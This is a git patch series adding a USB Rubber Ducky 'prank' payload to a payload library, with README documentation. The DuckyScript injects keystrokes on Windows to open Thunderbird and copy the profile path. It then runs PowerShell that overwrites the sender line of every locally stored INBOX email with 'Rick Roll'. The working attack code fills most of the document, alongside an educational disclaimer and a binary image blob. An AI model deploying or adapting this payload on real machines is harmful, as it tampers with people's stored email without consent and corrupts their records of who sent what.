From f2e1f66bc6bf7c7b7e33a81a8d516fa0cae45dd3 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 08:53:17 +0200 Subject: [PATCH 1/4] Prank In The Middle - Thunderbird The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists. --- .../Prank_In_The_Middle_Thunderbird/1.PNG | Bin 0 -> 10371 bytes .../Prank_In_The_Middle_Thunderbird/README.md | 167 ++++++++++++++++++ .../payload.txt | 110 ++++++++++++ 3 files changed, 277 insertions(+) create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/1.PNG create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/1.PNG b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/1.PNG new file mode 100644 index 0000000000000000000000000000000000000000..7b077d3af36dcda56f5a0a08801c14ccf0dd856b GIT binary patch literal 10371 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. + - Save the modified content back to the original email files. + +## Code Details + +### System Detection && Short Start DELAY + +```plaintext +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + ... + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION +``` + +### Navigating in Thunderbird + +```plaintext +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +ENTER +DELAY 500 +REPEAT 2 UPARROW +ENTER +DELAY 500 +REPEAT 3 UPARROW +ENTER +DELAY 500 +REPEAT 11 TAB +ENTER +DELAY 500 +REPEAT 4 TAB +SPACEBAR +ENTER +CTRL c +ALT F4 +``` + +### Opening PowerShell and Email Manipulation + +```plaintext +WIN r +STRING powershell +ENTER +DELAY 1500 +STRING cd +CTRL v +ENTER + +STRINGLN + cd ImapMail + $directories = Get-ChildItem -Directory | Select-Object FullName + foreach ($dir in $directories) { + $newPath = $dir.FullName -replace '\\', '/' + $newPath += "/INBOX" + if (Test-Path $newPath) { + $emails = Get-Content -Path $newPath -Raw + $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " + Set-Content -Path $newPath -Value $modifiedEmails -Force + } + } +END_STRINGLN +DELAY 1000 +ALT F4 +``` + +### The Regex + +The regex was not created from scratch but was taken from the discussion “[How can I validate an email address using a regular expression?](https://stackoverflow.com/questions/201323/how-can-i-validate-an-email-address-using-a-regular-expression)” posted on **StackOverflow**. + +```plaintext +(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\]) +``` + +The only difference is the addition of `**From: <...>**` which reduces to just the email addresses that sent the emails and not all addresses detected in the file that might depict other references + +```plaintext +From:\s.*\s<...> +``` + +## Notes + +1) This program was created for educational and demonstrative purposes. Unauthorized alteration of emails is illegal, and violating others' privacy is a crime. +2) Ensure you have the necessary permissions before running any script that modifies personal or sensitive data. +3) Considering [Staged Payloads](https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads), generally, it is not possible to include code that downloads from external sources. In this case, however, the setup involves a redirect to a YouTube video, which has been conveniently shortened using `tiny.url`. It is important to note that this redirect can be modified, and I strongly recommend changing it to a personal link for your security. While I assure you that I will never alter the link, no one can guarantee that I won't be compromised, allowing someone else to alter the redirect. It is always advisable and a good practice to never use links found online without understanding the actual redirect and replacing it with your own link. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt new file mode 100644 index 0000000..0af6ef7 --- /dev/null +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -0,0 +1,110 @@ +REM ##################################################### +REM # # +REM # Title : Prank In The Middle - Thunderbird # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : Prank # +REM # Target : Windows 10/11 # +REM # # +REM ##################################################### + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +REM Open Thunderbird and goto settings +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +ENTER +DELAY 500 +REPEAT 2 UPARROW +ENTER +DELAY 500 +REPEAT 3 UPARROW +ENTER +DELAY 500 + +REM Goto profile directory +REPEAT 11 TAB +ENTER +DELAY 500 + +REM Copy the directory path +REPEAT 4 TAB +DELAY 500 +SPACEBAR +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 500 +ALT F4 +DELAY 500 + +REM Open the powershell and goto the directory +WIN r +STRING powershell +ENTER +DELAY 1500 +STRING cd +DELAY 500 +CTRL v +DELAY 500 +ENTER +DELAY 500 + +REM Get the INBOX content and edit it overwriting. Then close the powershell +STRINGLN + cd ImapMail + $directories = Get-ChildItem -Directory | Select-Object FullName + foreach ($dir in $directories) { + # Replace backslashes with slash + $newPath = $dir.FullName -replace '\\', '/' + + # Add the sub-string “/INBOX” to the end + $newPath += "/INBOX" + + # Check whether the INBOX file exists + if (Test-Path $newPath) { + # Check whether the INBOX file exists + $emails = Get-Content -Path $newPath -Raw + + # Replace email sender with Rick Roll! + # The following operation is simplified and assumes that the sender starts with “From: ...” + # and does not contain complex MIME structures + $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " + + # Write the modified content into the INBOX file. + Set-Content -Path $newPath -Value $modifiedEmails -Force + } + } +END_STRINGLN +DELAY 1000 +ALT F4 \ No newline at end of file From 9ac4d543b1b9f69a729e9753d4229d5f3ad4f97d Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 09:02:52 +0200 Subject: [PATCH 2/4] Image removed to lighten repository --- .../prank/Prank_In_The_Middle_Thunderbird/1.PNG | Bin 10371 -> 0 bytes .../Prank_In_The_Middle_Thunderbird/README.md | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) delete mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/1.PNG diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/1.PNG b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/1.PNG deleted file mode 100644 index 7b077d3af36dcda56f5a0a08801c14ccf0dd856b..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 10371 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 